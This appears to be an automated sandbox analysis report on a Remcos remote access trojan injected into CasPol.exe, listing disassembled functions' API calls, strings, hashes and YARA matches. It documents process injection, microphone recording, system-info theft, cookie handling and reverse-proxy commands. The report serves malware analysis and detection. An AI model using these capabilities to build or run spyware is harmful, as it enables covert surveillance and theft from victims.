                                                                                                                                                                          • DecodePointer.KERNEL32(?,?,?,?,?,?,?,?,?,?,0045707F), ref: 00455FA7
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: DecodePointer
                                                                                                                                                                          • String ID: acos$asin$exp$log$log10$pow$sqrt
                                                                                                                                                                          • API String ID: 3527080286-3064271455
                                                                                                                                                                          • Opcode ID: d3e7b15c46cdd208759493adff4216d8049d52db36716e3e1ce652e173acd39f
                                                                                                                                                                          • Instruction ID: 9e278d4a377d0ea10dd73248deb0d867b2e8f6339126d6964ada8e5ca1a1e79f
                                                                                                                                                                          • Opcode Fuzzy Hash: d3e7b15c46cdd208759493adff4216d8049d52db36716e3e1ce652e173acd39f
                                                                                                                                                                          • Instruction Fuzzy Hash: AA515071900909DBCB10DF58E9481BDBBB0FB49306F924197D841A7296DB798928CB1E
                                                                                                                                                                          APIs
                                                                                                                                                                          • ShellExecuteW.SHELL32(00000000,open,dxdiag,00000000,00000000,00000000), ref: 00417530
                                                                                                                                                                            • Part of subcall function 0041C516: CreateFileW.KERNEL32(00000000,80000000,00000003,00000000,00000003,00000080,00000000), ref: 0041C52F
                                                                                                                                                                          • Sleep.KERNEL32(00000064), ref: 0041755C
                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000), ref: 00417590
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CreateDeleteExecuteShellSleep
                                                                                                                                                                          • String ID: /t $\sysinfo.txt$dxdiag$open$temp
                                                                                                                                                                          • API String ID: 1462127192-2001430897
                                                                                                                                                                          • Opcode ID: c7c0df58ca2988e82ae5829310215e9c0806f975c384f1ee27ed20e1776dca68
                                                                                                                                                                          • Instruction ID: 4d831fdf2c11e0d815db77489a542135a470e493f6e320739c61594aa9f7fbeb
                                                                                                                                                                          • Opcode Fuzzy Hash: c7c0df58ca2988e82ae5829310215e9c0806f975c384f1ee27ed20e1776dca68
                                                                                                                                                                          • Instruction Fuzzy Hash: A4313D71940119AADB04FBA1DC96DED7739AF50309F00017EF606731E2EF785A8ACA9C
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00472B28,00000000,?,00003000,00000004,00000000,00000001), ref: 00407418
                                                                                                                                                                          • GetCurrentProcess.KERNEL32(00472B28,00000000,00008000,?,00000000,00000001,00000000,00407691,C:\Windows\Microsoft.NET\Framework\v4.0.30319\CasPol.exe), ref: 004074D9
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CurrentProcess
                                                                                                                                                                          • String ID: PEB: %x$[+] NtAllocateVirtualMemory Success$[-] NtAllocateVirtualMemory Error$\explorer.exe$explorer.exe$windir
                                                                                                                                                                          • API String ID: 2050909247-4242073005
                                                                                                                                                                          • Opcode ID: 41d734f691f0bff291f27abbb43ce86c97c8aa0f168a1d918fb74810e8f30e7b
                                                                                                                                                                          • Instruction ID: b8c3dc73ce560081c95a6921e0e4b034ac7c55c8f908ce4a4bfc67d5bc942e58
                                                                                                                                                                          • Opcode Fuzzy Hash: 41d734f691f0bff291f27abbb43ce86c97c8aa0f168a1d918fb74810e8f30e7b
                                                                                                                                                                          • Instruction Fuzzy Hash: 7631C271604700ABD311EF65DE46F1677A8FB48315F10087EF509E6292DBB8B8418B6E
                                                                                                                                                                          APIs
                                                                                                                                                                          • std::_Lockit::_Lockit.LIBCPMT ref: 00410EA9
                                                                                                                                                                          • int.LIBCPMT ref: 00410EBC
                                                                                                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::_Lockit.LIBCPMT ref: 0040E10D
                                                                                                                                                                            • Part of subcall function 0040E0FC: std::_Lockit::~_Lockit.LIBCPMT ref: 0040E127
                                                                                                                                                                          • std::_Facet_Register.LIBCPMT ref: 00410EFC
                                                                                                                                                                          • std::_Lockit::~_Lockit.LIBCPMT ref: 00410F05
                                                                                                                                                                          • __CxxThrowException@8.LIBVCRUNTIME ref: 00410F23
                                                                                                                                                                          • __Init_thread_footer.LIBCMT ref: 00410F64
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: std::_$Lockit$Lockit::_Lockit::~_$Exception@8Facet_Init_thread_footerRegisterThrow
                                                                                                                                                                          • String ID: <kG$@kG
                                                                                                                                                                          • API String ID: 3815856325-1261746286
                                                                                                                                                                          • Opcode ID: cc4f498f03e49cc8175e06c4afa4c34db09ac51f823a1e2d31623f5746c52272
                                                                                                                                                                          • Instruction ID: 0588f859592fb32d2b707c82d02c9514845f82bff388d80d729849e078334d39
                                                                                                                                                                          • Opcode Fuzzy Hash: cc4f498f03e49cc8175e06c4afa4c34db09ac51f823a1e2d31623f5746c52272
                                                                                                                                                                          • Instruction Fuzzy Hash: 622107329005249BCB14FBAAD8429DE7769DF48324F21416FF904E72D1DBB9AD818BDC
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetModuleFileNameA.KERNEL32(00000000,?,00000104), ref: 0041D507
                                                                                                                                                                            • Part of subcall function 0041D5A0: RegisterClassExA.USER32 ref: 0041D5EC
                                                                                                                                                                            • Part of subcall function 0041D5A0: CreateWindowExA.USER32 ref: 0041D607
                                                                                                                                                                            • Part of subcall function 0041D5A0: GetLastError.KERNEL32 ref: 0041D611
                                                                                                                                                                          • ExtractIconA.SHELL32(00000000,?,00000000), ref: 0041D53E
                                                                                                                                                                          • lstrcpynA.KERNEL32(00474B70,Remcos,00000080), ref: 0041D558
                                                                                                                                                                          • Shell_NotifyIconA.SHELL32(00000000,00474B58), ref: 0041D56E
                                                                                                                                                                          • TranslateMessage.USER32(?), ref: 0041D57A
                                                                                                                                                                          • DispatchMessageA.USER32(?), ref: 0041D584
                                                                                                                                                                          • GetMessageA.USER32 ref: 0041D591
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Message$Icon$ClassCreateDispatchErrorExtractFileLastModuleNameNotifyRegisterShell_TranslateWindowlstrcpyn
                                                                                                                                                                          • String ID: Remcos
                                                                                                                                                                          • API String ID: 1970332568-165870891
                                                                                                                                                                          • Opcode ID: 731e0475cdd51c62647780fa2fa3280f65193767bc99efc51189d173a824088e
                                                                                                                                                                          • Instruction ID: c2fc9e39e559a2afed00746d39c192473857db467f2681b349ddfe36236392a3
                                                                                                                                                                          • Opcode Fuzzy Hash: 731e0475cdd51c62647780fa2fa3280f65193767bc99efc51189d173a824088e
                                                                                                                                                                          • Instruction Fuzzy Hash: 11015EB1840348EBD7109FA1EC4CFABBBBCABC5705F00406AF505921A1D7B8E885CB6D
                                                                                                                                                                          APIs
                                                                                                                                                                          • AllocConsole.KERNEL32 ref: 0041CE35
                                                                                                                                                                          • GetConsoleWindow.KERNEL32 ref: 0041CE3B
                                                                                                                                                                          • ShowWindow.USER32(00000000,00000000), ref: 0041CE4E
                                                                                                                                                                          • SetConsoleOutputCP.KERNEL32(000004E4), ref: 0041CE73
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Console$Window$AllocOutputShow
                                                                                                                                                                          • String ID: Remcos v$5.2.0 Pro$CONOUT$$h]v
                                                                                                                                                                          • API String ID: 4067487056-2805384329
                                                                                                                                                                          • Opcode ID: 4ac208d8a2a9dd681627466f3850d62ccb8bf7ad48dd9727624a0f6f50ade13e
                                                                                                                                                                          • Instruction ID: a031bdd2f27af694b11ce09d1e3c688e218bb3586dee27dfc95755d0e541b829
                                                                                                                                                                          • Opcode Fuzzy Hash: 4ac208d8a2a9dd681627466f3850d62ccb8bf7ad48dd9727624a0f6f50ade13e
                                                                                                                                                                          • Instruction Fuzzy Hash: 2D014471A80304BBD610F7F19D8BF9EB7AC9B18B05F500527BA04A70D2EB6DD944466E
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID:
                                                                                                                                                                          • Opcode ID: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                                                                                                                                          • Instruction ID: c312da418a410335279f0cc1971bad4557be7deeadefc114a47e367d78dfde09
                                                                                                                                                                          • Opcode Fuzzy Hash: fe4c6299b1f4debc2f0613a6a4b69777743e78c2e08cef74df9dc0c7942dc402
                                                                                                                                                                          • Instruction Fuzzy Hash: 94C1FA70D04249AFEF11DFA8CC41BAE7BB0AF09304F19415AE915A7392C77C9941CB69
                                                                                                                                                                          APIs
                                                                                                                                                                          • GetCPInfo.KERNEL32(00000000,00000001,?,7FFFFFFF,?,?,004540DC,00000000,00000000,?,00000001,?,?,?,?,00000001), ref: 00453EAF
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000001,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453F32
                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00453F6A
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000001,00000000,004540DC,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FC5
                                                                                                                                                                          • __alloca_probe_16.LIBCMT ref: 00454014
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000009,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00453FDC
                                                                                                                                                                            • Part of subcall function 004461B8: RtlAllocateHeap.NTDLL(00000000,00435329,?,?,004388C7,?,?,00000000,?,?,0040DE9D,00435329,?,?,?,?), ref: 004461EA
                                                                                                                                                                          • MultiByteToWideChar.KERNEL32(00000000,00000001,00000000,00000000,00000000,00000000,?,004540DC,00000000,00000000,?,00000001,?,?,?,?), ref: 00454058
                                                                                                                                                                          • __freea.LIBCMT ref: 00454083
                                                                                                                                                                          • __freea.LIBCMT ref: 0045408F
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: ByteCharMultiWide$__alloca_probe_16__freea$AllocateHeapInfo
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 201697637-0
                                                                                                                                                                          • Opcode ID: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                                                                                                                                                          • Instruction ID: 957693029e8655488503f3238c5b69ab87e72ad781d0cd1ca1c521277c14990f
                                                                                                                                                                          • Opcode Fuzzy Hash: c58c81590331c8434bd69e2fe975192d11ab6ad4f25d793436d733d3ebd853b6
                                                                                                                                                                          • Instruction Fuzzy Hash: 2B91D472E002069BDB208E65C846EEFBBF59F49756F14051BED00EB282D73DCD898769
                                                                                                                                                                          APIs
                                                                                                                                                                          • CopyFileW.KERNEL32(?,?,00000000), ref: 10001D1B
                                                                                                                                                                          • CreateFileW.KERNEL32(?,80000000,00000000,00000000,00000003,00000080,00000000), ref: 10001D37
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D4B
                                                                                                                                                                          • GetFileSize.KERNEL32(00000000,00000000,?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D58
                                                                                                                                                                          • ReadFile.KERNEL32(00000000,00000000,00000000,?,00000000), ref: 10001D72
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 10001D7D
                                                                                                                                                                          • DeleteFileW.KERNEL32(?,?,?,00000000,?,?,?,?,?,?,00000000), ref: 10001D8A
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.697379878.0000000010001000.00000040.00001000.00020000.00000000.sdmp, Offset: 10000000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.697370676.0000000010000000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.697379878.0000000010016000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_10000000_CasPol.jbxd
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$Delete$CloseCopyCreateHandleReadSize
                                                                                                                                                                          • String ID:
                                                                                                                                                                          • API String ID: 1454806937-0
                                                                                                                                                                          • Opcode ID: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                          • Instruction ID: 3114db45d92e83daf92c47a85baf70c14dd0292bf94a6379629bf72341f68b19
                                                                                                                                                                          • Opcode Fuzzy Hash: 95ffba8e0906de61fbf41533eef9bce15325b0b0370a179d90a4a5ca68fedbfa
                                                                                                                                                                          • Instruction Fuzzy Hash: 2221FCB594122CAFF710EBA08CCCFEF76ACEB08395F010566F515D2154D6709E458A70
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 00448295: GetLastError.KERNEL32(00000020,?,0043A875,?,?,?,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B), ref: 00448299
                                                                                                                                                                            • Part of subcall function 00448295: _free.LIBCMT ref: 004482CC
                                                                                                                                                                            • Part of subcall function 00448295: SetLastError.KERNEL32(00000000,0043F9F8,?,?,00000020,00000000,?,?,?,0042DD92,0000003B,?,00000041,00000000,00000000), ref: 0044830D
                                                                                                                                                                            • Part of subcall function 00448295: _abort.LIBCMT ref: 00448313
                                                                                                                                                                          • _memcmp.LIBVCRUNTIME ref: 004454A4
                                                                                                                                                                          • _free.LIBCMT ref: 00445515
                                                                                                                                                                          • _free.LIBCMT ref: 0044552E
                                                                                                                                                                          • _free.LIBCMT ref: 00445560
                                                                                                                                                                          • _free.LIBCMT ref: 00445569
                                                                                                                                                                          • _free.LIBCMT ref: 00445575
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: _free$ErrorLast$_abort_memcmp
                                                                                                                                                                          • String ID: C
                                                                                                                                                                          • API String ID: 1679612858-1037565863
                                                                                                                                                                          • Opcode ID: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                                                                                                                                          • Instruction ID: c5fa7cd4a0def74fccfc383a36f0c71fd12082b8797d706f49daa7c6421ebafc
                                                                                                                                                                          • Opcode Fuzzy Hash: 988bd1a8119ed4a709ec3dab848aee85f0f523c2f313b021c20f4b3607b372ff
                                                                                                                                                                          • Instruction Fuzzy Hash: D4B13775A016199FEB24DF18C885BAEB7B4FF48304F5085EAE809A7351E774AE90CF44
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID:
                                                                                                                                                                          • String ID: tcp$udp
                                                                                                                                                                          • API String ID: 0-3725065008
                                                                                                                                                                          • Opcode ID: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                                                                          • Instruction ID: 4fb2fbaa1818e082f2863e0a7c91e4ace7fe62ed23b491eff3584b955907a2f3
                                                                                                                                                                          • Opcode Fuzzy Hash: e3882082d73cb51732241927fa811467e6376eb334e21639ae703d67e169e483
                                                                                                                                                                          • Instruction Fuzzy Hash: FC7197706083028FDB248F55D4817ABB7E4AFC8355F20482FF88697351E778DE858B9A
                                                                                                                                                                          APIs
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: Eventinet_ntoa
                                                                                                                                                                          • String ID: GetDirectListeningPort$StartForward$StartReverse$StopForward$StopReverse
                                                                                                                                                                          • API String ID: 3578746661-168337528
                                                                                                                                                                          • Opcode ID: d0b76150e621080491dc5dd9b369e9b9f9096b4c029590180129f3bde6b2885f
                                                                                                                                                                          • Instruction ID: cd9a01f22de2d9f6a9994d78948339ea64d6c0f71f497d0a384e35af32d82467
                                                                                                                                                                          • Opcode Fuzzy Hash: d0b76150e621080491dc5dd9b369e9b9f9096b4c029590180129f3bde6b2885f
                                                                                                                                                                          • Instruction Fuzzy Hash: 0E51C531A042015BC724FB36D95AAAE36A5AB80344F40453FF606576F2EF7C8985C7DE
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateFileW.KERNEL32(00000000,00000004,00000000,00000000,00000002,00000080,00000000), ref: 00407A00
                                                                                                                                                                          • WriteFile.KERNEL32(00000000,?,00000000,000186A0,00000000), ref: 00407A48
                                                                                                                                                                            • Part of subcall function 00404AA1: send.WS2_32(FFFFFFFF,00000000,00000000,00000000), ref: 00404B36
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00407A88
                                                                                                                                                                          • MoveFileW.KERNEL32 ref: 00407AA5
                                                                                                                                                                          • CloseHandle.KERNEL32(00000000), ref: 00407AD0
                                                                                                                                                                          • DeleteFileW.KERNEL32(00000000,?,?,?,?,?,?,?,0000000A,00000000), ref: 00407AE0
                                                                                                                                                                            • Part of subcall function 00404B96: WaitForSingleObject.KERNEL32(00000000,000000FF,?,00474F08,00404C49,00000000,00000000,00000000,?,00474F08,?), ref: 00404BA5
                                                                                                                                                                            • Part of subcall function 00404B96: SetEvent.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,?,?,?,?,?,0040548B), ref: 00404BC3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: File$CloseHandle$CreateDeleteEventMoveObjectSingleWaitWritesend
                                                                                                                                                                          • String ID: .part
                                                                                                                                                                          • API String ID: 1303771098-3499674018
                                                                                                                                                                          • Opcode ID: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                                                                                                          • Instruction ID: fa021c15c5d1e87e569c09a19ead990ccf19330fc060556597d24b4305e87d8f
                                                                                                                                                                          • Opcode Fuzzy Hash: f8f352d1944775a3033a6e3b226fb99e3d0dc97036554631b9c7d83676d303e1
                                                                                                                                                                          • Instruction Fuzzy Hash: 3A31B571508345AFC310EB61D84599FB3A8FF94359F00493FB945A21D2EB78EE08CB9A
                                                                                                                                                                          APIs
                                                                                                                                                                          • _strftime.LIBCMT ref: 00401BD4
                                                                                                                                                                            • Part of subcall function 00401CE9: CreateFileW.KERNEL32(00000000,40000000,00000000), ref: 00401D55
                                                                                                                                                                          • waveInUnprepareHeader.WINMM(00472A88,00000020,00000000), ref: 00401C86
                                                                                                                                                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401CC4
                                                                                                                                                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401CD3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: wave$Header$BufferCreateFilePrepareUnprepare_strftime
                                                                                                                                                                          • String ID: %Y-%m-%d %H.%M$.wav$tMG
                                                                                                                                                                          • API String ID: 3809562944-3627046146
                                                                                                                                                                          • Opcode ID: 477eb592cf8913c9b1db3799ce86c6a4457f3d06fe7f678cb2ce5cee42c76145
                                                                                                                                                                          • Instruction ID: 77224d9c3c18060e3821781750c24aeed92f5db76bec914a8a88ddbccf287b9a
                                                                                                                                                                          • Opcode Fuzzy Hash: 477eb592cf8913c9b1db3799ce86c6a4457f3d06fe7f678cb2ce5cee42c76145
                                                                                                                                                                          • Instruction Fuzzy Hash: 5F3181315043019FC325EB62DD46A9A77A8FB84319F40443EF149A31F2EFB89949CB9A
                                                                                                                                                                          APIs
                                                                                                                                                                            • Part of subcall function 004135E1: RegOpenKeyExA.KERNEL32(80000001,00000400,00000000,00020019,?), ref: 00413605
                                                                                                                                                                            • Part of subcall function 004135E1: RegQueryValueExA.KERNEL32 ref: 00413622
                                                                                                                                                                            • Part of subcall function 004135E1: RegCloseKey.KERNEL32(?), ref: 0041362D
                                                                                                                                                                          • ExpandEnvironmentStringsA.KERNEL32(00000000,?,00000104,00000000), ref: 0040BFA6
                                                                                                                                                                          • PathFileExistsA.SHLWAPI(?), ref: 0040BFB3
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000478000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                          Joe Sandbox IDA Plugin
                                                                                                                                                                          • Snapshot File: hcaresult_20_2_400000_CasPol.jbxd
                                                                                                                                                                          Yara matches
                                                                                                                                                                          Similarity
                                                                                                                                                                          • API ID: CloseEnvironmentExistsExpandFileOpenPathQueryStringsValue
                                                                                                                                                                          • String ID: [IE cookies cleared!]$[IE cookies not found]$@ev$Cookies$Software\Microsoft\Windows\CurrentVersion\Explorer\User Shell Folders
                                                                                                                                                                          • API String ID: 1133728706-857889915
                                                                                                                                                                          • Opcode ID: cd9327ffdb431f4455594d9103b4f46f207419a2cf19a94e91c1903f73b76458
                                                                                                                                                                          • Instruction ID: 7718d61ab729039ae94473664947c91a52367f601ff6055b29c84dcba8ed2574
                                                                                                                                                                          • Opcode Fuzzy Hash: cd9327ffdb431f4455594d9103b4f46f207419a2cf19a94e91c1903f73b76458
                                                                                                                                                                          • Instruction Fuzzy Hash: E7215230A40219A6CB14F7F1CC969EE7729AF50744F80017FE502B71D1EB7D6945C6DA
                                                                                                                                                                          APIs
                                                                                                                                                                          • CreateDirectoryW.KERNEL32(00000000,00000000), ref: 00401A7D
                                                                                                                                                                          • waveInOpen.WINMM(00472AC0,000000FF,00472AC8,Function_00001B8F,00000000,00000000), ref: 00401B13
                                                                                                                                                                          • waveInPrepareHeader.WINMM(00472A88,00000020), ref: 00401B67
                                                                                                                                                                          • waveInAddBuffer.WINMM(00472A88,00000020), ref: 00401B76
                                                                                                                                                                          • waveInStart.WINMM ref: 00401B82
                                                                                                                                                                          Strings
                                                                                                                                                                          Memory Dump Source
                                                                                                                                                                          • Source File: 00000014.00000002.695653372.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                          • Associated: 00000014.00000002.695653372.0000000000474000.00000040.00000400.00020000.00000000.sdmpDownload File
